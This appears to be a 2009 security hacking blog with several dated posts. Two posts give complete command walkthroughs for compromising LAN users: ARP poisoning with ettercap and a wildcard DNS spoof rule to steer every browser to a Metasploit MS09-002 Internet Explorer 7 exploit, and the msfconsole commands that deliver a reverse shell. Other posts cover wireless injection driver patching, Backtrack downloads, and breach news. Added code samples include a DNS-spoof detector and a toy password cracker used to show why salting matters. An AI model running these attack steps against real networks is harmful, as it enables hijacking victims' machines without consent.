Feb 27

In my last video I showed how to use the MS09-002 exploit, but there was one problem: the vulnerable URL has to be opened by the end user. How do you get them there without sending links, mailing them, or hosting the page somewhere? The idea I came up with is DNS poisoning: ettercap ARP-poisons the LAN and its dns_spoof plugin forges the replies, so every DNS request the end users make is answered with our IP. Whenever they open IE7 the browser is sent to our exploit server on port 80, they get owned, and we get a shell
with the privileges of the logged-in user.

Tools used: ettercap and msfgui
1) Edit the etter.dns config file of your ettercap install and change the A records: remove everything under the A record section and add this single wildcard line

* A 192.168.147.128 (your IP)

With this rule ettercap forges an A-record reply pointing at your machine for every name the victims look up, so your system is effectively acting as their DNS server now.

2) In a shell, run

ettercap -T -q -M arp:remote -P dns_spoof //

(-T is text mode, -q quiet, -M arp:remote ARP-poisons the hosts so their traffic passes through you, and -P dns_spoof loads the plugin that answers DNS queries from etter.dns.)

3) Now run MSF3 (msfgui) and choose exploits -> windows -> browser -> ms09_002_memory_corruption

4) Select your target: Windows XP SP2

5) Use the payload windows/shell_reverse_tcp

6) Change SRVPORT to 80 (the spoofed DNS replies send browsers to your IP on port 80) and set URIPATH to / so that whatever path the victim's browser asks for is answered with the exploit page (the default URIPATH is a random string, which a user typing an ordinary URL would never hit); leave the remaining options as they are and click Apply

7) On the end-user side, as soon as they open IE7 and browse anywhere, the forged DNS reply lands them on your exploit server on port 80
and you get a shell. Note that this only reaches hosts on the LAN segment ettercap is poisoning, and only for names the victim's resolver actually asks for (names already in its DNS cache produce no query to spoof).
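As an added example (written for this page, not ettercap's or Metasploit's code), the following models the single wildcard rule from step 1 the way an etter.dns file is read, and then runs a simple detector over a constructed log of DNS replies to show what the redirect looks like from the victims' side. Assumptions of mine: an A record is a line of the form `<name-pattern> A <ip>` with `*` as a glob wildcard and first match winning, and the reply-log format is my own, not any tool's.

```python
# Added example, written for this page; it is not ettercap's or Metasploit's
# code. It models the wildcard A record from step 1 the way etter.dns is read
# and runs a detector over a constructed log of DNS replies.
# Assumptions (mine): an A record is "<name-pattern> A <ip>" where "*" is a
# glob wildcard and the first match wins; the log format below is my own.
import fnmatch
import ipaddress
from collections import defaultdict

ATTACKER_IP = "192.168.147.128"  # the IP used in the post

# Constructed etter.dns fragment: only the wildcard rule from step 1.
ETTER_DNS = """
# A records
*   A   192.168.147.128
"""


def parse_etter_dns_a_records(text):
    """Return [(pattern, ip), ...] for the A records in etter.dns-style text."""
    records = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        if len(parts) == 3 and parts[1].upper() == "A":
            ipaddress.ip_address(parts[2])    # raises on a malformed address
            records.append((parts[0].lower(), parts[2]))
    return records


def spoofed_answer(records, qname):
    """IP the spoofer would put in the forged reply for qname, or None."""
    name = qname.rstrip(".").lower()
    for pattern, ip in records:
        if fnmatch.fnmatchcase(name, pattern):
            return ip
    return None


# Constructed reply log, one "client qname type answer ttl" record per line.
# Three unrelated public names all resolving to one RFC1918 address is the
# signature of the wildcard rule above.
REPLY_LOG = """\
10.0.0.5 www.google.com A 192.168.147.128 3600
10.0.0.5 update.microsoft.com A 192.168.147.128 3600
10.0.0.7 www.bbc.co.uk A 192.168.147.128 3600
10.0.0.7 intranet.corp.local A 10.0.0.20 300
10.0.0.9 mail.example.org A 93.184.216.34 60
"""


def flag_wildcard_redirects(log, min_names=3):
    """Return {answer_ip: sorted names} for answers that serve too many
    different names. A private answer for a public name alone is not enough
    (split-horizon DNS does that legitimately); the breadth is the tell."""
    names_by_ip = defaultdict(set)
    for line in log.splitlines():
        client, qname, rtype, answer, ttl = line.split()
        if rtype == "A":
            names_by_ip[answer].add(qname.lower())
    return {ip: sorted(names) for ip, names in names_by_ip.items()
            if len(names) >= min_names}


if __name__ == "__main__":
    rules = parse_etter_dns_a_records(ETTER_DNS)
    print("www.google.com ->", spoofed_answer(rules, "www.google.com"))
    print("flagged:", flag_wildcard_redirects(REPLY_LOG))
```

The detector deliberately keys on breadth rather than on "private IP for a public name", because internal resolvers with split-horizon views legitimately return RFC1918 answers; a single address answering for Google, Microsoft and the BBC at once does not happen by accident.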

Below is the video, as usual.

http://blip.tv/file/1822479

WirelessPunter

think beyond the limit

Feb 22

A new open source web application scanner

Features

* URL finder with adjustable crawl depth
* Passive XSS scan
* Forms processing
* Simple SQL injection scan
* Blind SQL injection scan
* Plugins
* Report generators (Text, HTML)
* CLI and GUI interfaces
* Cross-platform (Python + GTK)

Full details about this tool are at

http://code.google.com/p/xcobra/

Feb 21

This is my first video of this year, and my first on Backtrack 4 beta.
This time I will be showing a POC video of the MS Internet Explorer 7 memory corruption exploit (MS09-002), which
was released yesterday on milw0rm.

Guide
1) Update your Metasploit with svn update (my MSF is already up to date)
2) Open the MSF console
3) msf > use exploit/windows/browser/ms09_002_memory_corruption
4) msf exploit(ms09_002_memory_corruption) > set PAYLOAD windows/shell_reverse_tcp
5) msf exploit(ms09_002_memory_corruption) > set LPORT 1701
6) msf exploit(ms09_002_memory_corruption) > set LHOST 192.168.147.128
7) msf exploit(ms09_002_memory_corruption) > set URIPATH punter.html
8) msf exploit(ms09_002_memory_corruption) > set SRVPORT 80
9) msf exploit(ms09_002_memory_corruption) > exploit
   This starts the web server on port 80 serving the exploit page at http://192.168.147.128/punter.html and a reverse handler listening on port 1701; when the target opens that URL in IE7 a session is created.
10) msf exploit(ms09_002_memory_corruption) > sessions -i 1   (interact with the first session)
Below is the video

http://blip.tv/file/1798741
done
WirelessPunter

Feb 18

VoIP Security Tools, alas!
What are these tools, and what are they used for? (I even asked myself that.)
Yes, they exist for testing the security of VoIP. After a lot of Google searching I came across a website with VoIP security whitepapers and tools; the link is below:
http://www.voipsa.org/Resources/tools.php
Enjoy

Punter
(I don't have a choice; if you have more choices in life you never come up)

Feb 11

How to patch the wireless drivers for RTL8187-chipset Wi-Fi cards to inject in Backtrack 4 beta. This how-to was written late at night, so forgive any spelling mistakes ;)

Today I was just playing with Backtrack 4 beta and tried to check whether my wireless card was able to inject for testing WEP. I tried with the default drivers in BT4 but it was not working and could not inject with them, so I took a few minutes to patch in the injection drivers and thought I would write a small how-to so that it will be easy for others.

1)ifconfig wlan0 down  

2)rmmod r8187 rtl8187 2>/dev/null

3)wget http://dl.aircrack-ng.org/drivers/rtl8187_linux_26.1010.zip

4)unzip rtl8187_linux_26.1010.zip

5)cd rtl8187_linux_26.1010.0622.2006/

6)wget http://patches.aircrack-ng.org/rtl8187_2.6.27.patch

7)tar xzf drv.tar.gz

8)tar xzf stack.tar.gz

9)patch -Np1 -i rtl8187_2.6.27.patch

10)make 

If the make command fails with a compile error like the one below

“asm/semaphore.h: No such file or directory”

it is because of a kernel mismatch for this driver (newer kernels moved these headers under linux/). To fix it, edit r8187.h:

nano rtl8187_linux_26.1010.0622.2006/beta-8187/r8187.h

go to lines 46 and 47 and look for

#include <asm/io.h>

#include <asm/semaphore.h>

and replace those two lines with this:

#if (LINUX_VERSION_CODE < KERNEL_VERSION(2,6,19))

#include <asm/io.h>

#include <asm/semaphore.h>

#else

#include <linux/io.h>

#include <linux/semaphore.h>

#endif

After saving, run make again.

11)make install

Now reboot the system and type

12) iwconfig, and you will see wlan0 listed as your interface

13) airmon-ng start wlan0   (puts the card into monitor mode)

14) aireplay-ng -9 wlan0   (tests whether your card can inject)

The result should look like this:

14:15:20  Trying broadcast probe requests…

14:15:20  Injection is working!

14:15:21  Found 1 AP

14:15:21  Trying directed probe requests…

14:15:21  00:1C:13:156:55:99 – channel: 11 – ‘linksys’

14:15:25  Ping (min/avg/max): 3.907ms/108.614ms/160.149ms Power: 8.13

14:15:25  30/30: 100%
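As an added example (written for this page, not the aircrack-ng project's code), the script below automates the two parts of the procedure above that are easiest to get wrong by hand: the r8187.h include edit from step 10, applied so that running it twice cannot nest the guard, and reading the aireplay-ng -9 output from step 14 to decide whether injection actually works. Assumptions of mine: the header carries the two literal #include lines quoted above on adjacent lines (their exact line numbers do not matter), and the aireplay-ng transcript embedded below is constructed to mirror the one in the post.

```python
# Added example, written for this page; it is not the aircrack-ng project's
# code. It automates the r8187.h include fix (step 10) and reads the result
# of aireplay-ng -9 (step 14). Assumptions (mine): the header has the two
# literal #include lines quoted above on adjacent lines, and the transcript
# below is constructed to mirror the one in the post.
import re

OLD_INCLUDES = "#include <asm/io.h>\n#include <asm/semaphore.h>\n"

NEW_INCLUDES = """\
#if (LINUX_VERSION_CODE < KERNEL_VERSION(2,6,19))
#include <asm/io.h>
#include <asm/semaphore.h>
#else
#include <linux/io.h>
#include <linux/semaphore.h>
#endif
"""


def patch_r8187_header(source):
    """Swap the unconditional asm/ includes for the version-guarded block.
    Returns (new_source, changed). Running it twice is safe: a header that
    already has the guard is returned untouched, so a second attempt at
    `make` cannot leave you with nested #if blocks."""
    if "#include <linux/semaphore.h>" in source:
        return source, False
    if OLD_INCLUDES not in source:
        raise ValueError("r8187.h does not contain the expected include pair")
    return source.replace(OLD_INCLUDES, NEW_INCLUDES, 1), True


def patch_file(path):
    """Apply patch_r8187_header to a header on disk, in place."""
    with open(path) as f:
        src = f.read()
    new, changed = patch_r8187_header(src)
    if changed:
        with open(path, "w") as f:
            f.write(new)
    return changed


# Constructed aireplay-ng -9 transcript (plain "-" separators; the dashes
# in the post's copy are an artifact of the web page).
AIREPLAY_OUTPUT = """\
14:15:20  Trying broadcast probe requests...
14:15:20  Injection is working!
14:15:21  Found 1 AP
14:15:21  Trying directed probe requests...
14:15:21  00:11:22:33:44:55 - channel: 11 - 'linksys'
14:15:25  Ping (min/avg/max): 3.907ms/108.614ms/160.149ms Power: 8.13
14:15:25  30/30: 100%
"""

AP_LINE = re.compile(
    r"^\d\d:\d\d:\d\d\s+([0-9A-Fa-f:]{17}) - channel:\s*(\d+) - '(.*)'$", re.M)
RATIO_LINE = re.compile(r"^\d\d:\d\d:\d\d\s+(\d+)/(\d+):\s*\d+%$", re.M)


def injection_result(output):
    """Summarise an `aireplay-ng -9` run: whether the broadcast test passed,
    which APs answered the directed probes, and the per-AP hit ratios."""
    return {
        "working": "Injection is working!" in output,
        "aps": [(mac, int(ch), essid) for mac, ch, essid in AP_LINE.findall(output)],
        "ratios": [(int(got), int(sent)) for got, sent in RATIO_LINE.findall(output)],
    }


if __name__ == "__main__":
    print(injection_result(AIREPLAY_OUTPUT))
```

One caveat on the guard itself: LINUX_VERSION_CODE and KERNEL_VERSION are defined in <linux/version.h>, so if the compiler reports them as undefined after the edit, add that include above the guard.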

done

WipU

Feb 10

You can get the ISO and the VMware image here; an md5sum and sha512sum are published for each, so verify the download before you use it:

http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-vm

Please do not link to the files directly.

Release information will shortly be available on the Remote Exploit web site.

Feb 10

Hi guys
BT4 beta will be released in a few hours from now, so before that let us look at the hard disk installation guide from muts.

http://www.offensive-security.com/documentation/bt4install.pdf

Feb 8

Cisco security experts are urging admins to update their wireless LAN hardware following the discovery of multiple vulnerabilities in its enterprise Wi-Fi kit.
Security flaws in Cisco Wireless LAN Controllers, Cisco Catalyst 6500 Wireless Services Modules (WiSMs), and Cisco Catalyst 3750 Integrated Wireless LAN Controllers give attackers a way to knock over vulnerable hardware.
All Cisco Wireless LAN Controllers running version 4.2 of the network giant's software are affected by a pair of denial of service flaws. A third DoS flaw affects software versions 4.1 and later.

The denial of service bugs include a flaw in the handling of web authentication, which can cause an affected device to reload, and a separate flaw (which also affects version 4.1 of the software) that lets vulnerable kit freeze up on receipt of malformed data packets.
Cisco's full advisory lists the affected models and the software patches.

Feb 8

In the past few weeks we have noticed a steady increase in posts about this: everywhere you look, people are suddenly curious about how to "boot" someone from online video games. They are not entering a famous joypad combination to do it; rather, they are dabbling in rather more sinister ways of tampering with the oft-called "closed" environment of Xbox Live.

What is XBox Live?
Xbox Live is an online multiplayer gaming and digital media delivery service created and operated by Microsoft Corporation.
Live has long been a target of social engineers and hackers: fooling people into handing over their logins, and making fake Points generators stuffed with Trojans and keyloggers to steal login info.

How is this done?
Typically, someone connects their Xbox to their PC via a crossover cable (or via their wireless connection), joins a multiplayer game, then sniffs the traffic (you can see a tiny example of that in the first screenshot at the top of the article). They might use this method to grab IP addresses.

Feb 8

The online bulletin board phpBB (PHP Bulletin Board) was taken offline on Sunday following a security breach that exposed the user names, email addresses and hashed passwords of its entire user base.

In a message posted Sunday, administrators of phpBB.com said the attacker gained access through an unpatched security bug in PHPlist, a third-party email application. The attacker had access for more than two weeks before the breach was discovered, and phpBB.com remained down at the time of writing, more than three days later. Administrators did not respond to emails seeking comment.

A blogger who claimed to have carried out the attack said that details for more than 400,000 accounts were taken. The writer claims to have written a script that cracked more than 28,000 of the passwords, which were hashed with unsalted MD5, before posting them to the internet.

The attacker used a published exploit for the PHPlist bug.
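As an added example (written for this page; not phpBB's code and not the attacker's script), the following shows why an unsalted MD5 dump of the kind described above falls so quickly, what a per-user salt changes about the attacker's cost, and what a salted and stretched hash looks like instead. The wordlist and the "leaked" dumps are constructed here, not taken from the breach.

```python
# Added example, written for this page; it is not phpBB's or the attacker's
# code. It contrasts cracking an unsalted MD5 dump with a salted one and
# shows a stretched (PBKDF2) alternative. The wordlist and the "leaked"
# dumps are constructed, not from the breach.
import hashlib
import hmac
import os

WORDLIST = ["password", "letmein", "123456", "phpbb", "dragon", "qwerty"]


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


# Constructed dump in the shape the post describes: user -> unsalted MD5.
LEAKED_UNSALTED = {
    "alice": md5_hex(b"letmein"),
    "bob":   md5_hex(b"123456"),
    "carol": md5_hex(b"Tr0ub4dor&3"),   # not in the wordlist: stays uncracked
    "dave":  md5_hex(b"letmein"),       # same password as alice, same hash
}


def crack_unsalted(dump, wordlist):
    """Hash every candidate once and look all users up in that one table.
    Returns (cracked, hash_computations). The cost does not grow with the
    number of users, which is why 400,000 accounts are no harder than one."""
    table = {md5_hex(w.encode()): w for w in wordlist}
    cracked = {user: table[h] for user, h in dump.items() if h in table}
    return cracked, len(wordlist)


def salted_md5(password: bytes, salt: bytes) -> str:
    return md5_hex(salt + password)


def make_salted_dump(plaintexts):
    """user -> (salt_hex, md5(salt || password)) with a fresh random salt each."""
    out = {}
    for user, pw in plaintexts.items():
        salt = os.urandom(8)
        out[user] = (salt.hex(), salted_md5(pw.encode(), salt))
    return out


def crack_salted(dump, wordlist):
    """With salts the table cannot be shared: every user costs a fresh pass
    over the wordlist, and alice and dave no longer share a hash."""
    cracked, work = {}, 0
    for user, (salt_hex, h) in dump.items():
        salt = bytes.fromhex(salt_hex)
        for w in wordlist:
            work += 1
            if salted_md5(w.encode(), salt) == h:
                cracked[user] = w
                break
    return cracked, work


def store_pbkdf2(password: str, iterations: int = 100_000) -> str:
    """Salted and stretched: each guess now costs `iterations` HMAC calls."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password: str, stored: str) -> bool:
    algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print(crack_unsalted(LEAKED_UNSALTED, WORDLIST))
    salted = make_salted_dump({"alice": "letmein", "bob": "123456",
                               "carol": "Tr0ub4dor&3", "dave": "letmein"})
    print(crack_salted(salted, WORDLIST))
```

With six candidates and four users the unsalted crack costs six hashes in total and reveals that alice and dave share a password without cracking either; the salted version costs a wordlist pass per user and hides the reuse. Salting alone still leaves MD5 fast enough to brute-force, which is what the iteration count in the PBKDF2 form is for.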
